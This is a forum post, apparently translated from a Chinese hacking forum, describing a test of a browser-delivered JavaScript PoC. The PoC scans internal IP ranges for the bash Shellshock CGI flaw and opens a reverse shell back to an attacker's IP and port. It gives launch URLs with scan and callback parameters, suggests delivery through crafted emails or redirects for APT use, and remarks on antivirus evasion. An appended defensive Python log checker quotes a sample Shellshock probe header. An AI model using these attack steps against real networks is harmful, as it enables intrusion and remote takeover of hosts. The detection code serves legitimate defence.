I've only been on t00ls for a few days and haven't had time to write anything original. (I'll start the toast.)
Recently I saw an article by a foreign author that I thought was very good.
I tested this thing a bit and am sharing the process with everyone; I hope nobody downvotes it. I've been busy these days, so I'll write something original later.
It calls a JS file that scans the intranet for the bash vulnerability and then bounces a shell back. It could be used in an APT.
Test process:
The PoC is from the foreign author; I built the test on my own intranet.
First, listen on local port 250.
Then, after building it, visit
http://192.168.1.9/test.html?s=192.168.1.1&e3=1&e4=20&d=192.168.1.8/250
The first parameter, s, is the IP the scan starts from; e3 and e4 are the end values for the third and fourth octets, i.e. how far the scan runs through the C-class ranges. (Because I was testing locally, the parameters are set fairly small; you can play with them yourself.)
http://192.168.1.9/test.html?s=192.168.1.1&e3=255&e4=255&d=192.168.1.8/250
Looking at this example URL, the script sends an HTTP request to 192.168.1.1. It then proactively requests 192.168.1.2, 192.168.1.3, ..., 192.168.2.1, 192.168.2.2, and so on, until it reaches 192.168.255.255.
The last parameter, d (192.168.1.8/250), is the reverse-connection IP and port. (192.168.1.8 is my machine.)
From here you can see that after visiting
http://192.168.1.9/test.html?s=192.168.1.1&e3=1&e4=20&d=192.168.1.8/250
the page requests this JS file:
http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js
Once the intranet scan starts, it walks 192.168.1.1 through 192.168.1.20, accessing the CGI path set inside the PoC, and in the test the shell bounced back directly.
In real-world use this could be disguised in a carefully constructed email, a URL redirect, and so on.
The author says it was tested on Windows and Mac with IE, FF, Chrome and Safari, and all of them could bounce the shell. My local Norton and 360 raised no alarm; the author said Symantec does alarm.
Finally, the PoC is attached. Wealthy friends, please tip a few coins; many posts can't be viewed. If anyone doesn't understand something, reply below.
Attachment: JS that detects whether there is a bash vulnerability on the intranet and bounces a shell
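As an added example from the defender's side (not part of the original post or its PoC): a small Python check over Apache combined-format access logs that flags the request signature a probe of this kind leaves on a CGI host. It assumes the bash vulnerability meant is the 2014 function-import bug (Shellshock), whose published signature is a value starting with "() {", and the log lines are constructed for the demonstration.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Published signature of the 2014 bash function-import bug ("Shellshock"): a
# request value that begins with a shell function definition, "() {".
# Assumption: that is the "bash vulnerability" the post's scanner probes for.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log lines (not from the original post). Line 2 is a
# normal CGI hit referred from the scanner page; line 3 carries the signature.
SAMPLE_LOG = """\
192.168.1.8 - - [10/Oct/2014:12:00:01 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.8 - - [10/Oct/2014:12:00:02 +0800] "GET /cgi-bin/status HTTP/1.1" 200 88 "http://192.168.1.9/test.html" "Mozilla/5.0"
192.168.1.8 - - [10/Oct/2014:12:00:02 +0800] "GET /cgi-bin/status HTTP/1.1" 500 0 "http://192.168.1.9/test.html" "() { :;}; /bin/true"
"""

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry: Dict[str, str]) -> List[str]:
    """Return the reasons an entry looks like a Shellshock probe (empty if none)."""
    reasons = []
    # The path is percent-decoded so an encoded copy in the query string is seen too.
    for field, value in (("path", unquote(entry["path"])),
                         ("referer", entry["referer"]), ("agent", entry["agent"])):
        if SHELLSHOCK_RE.search(value):
            reasons.append(f"function-definition signature in {field}")
    # A CGI handler is where the web server hands request data to bash.
    if reasons and entry["path"].startswith("/cgi-bin/"):
        reasons.append("target is a CGI path")
    return reasons

def find_probes(log_text: str) -> List[Dict[str, str]]:
    """Scan an access log and return the entries flagged as probes, with reasons."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (reasons := classify(entry)):
            hits.append({**entry, "reasons": "; ".join(reasons)})
    return hits

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["path"], "->", hit["reasons"])
```

Only the User-Agent and Referer headers reach a combined-format log, so a full-header capture or a web application firewall log is needed to see the same signature in other request headers.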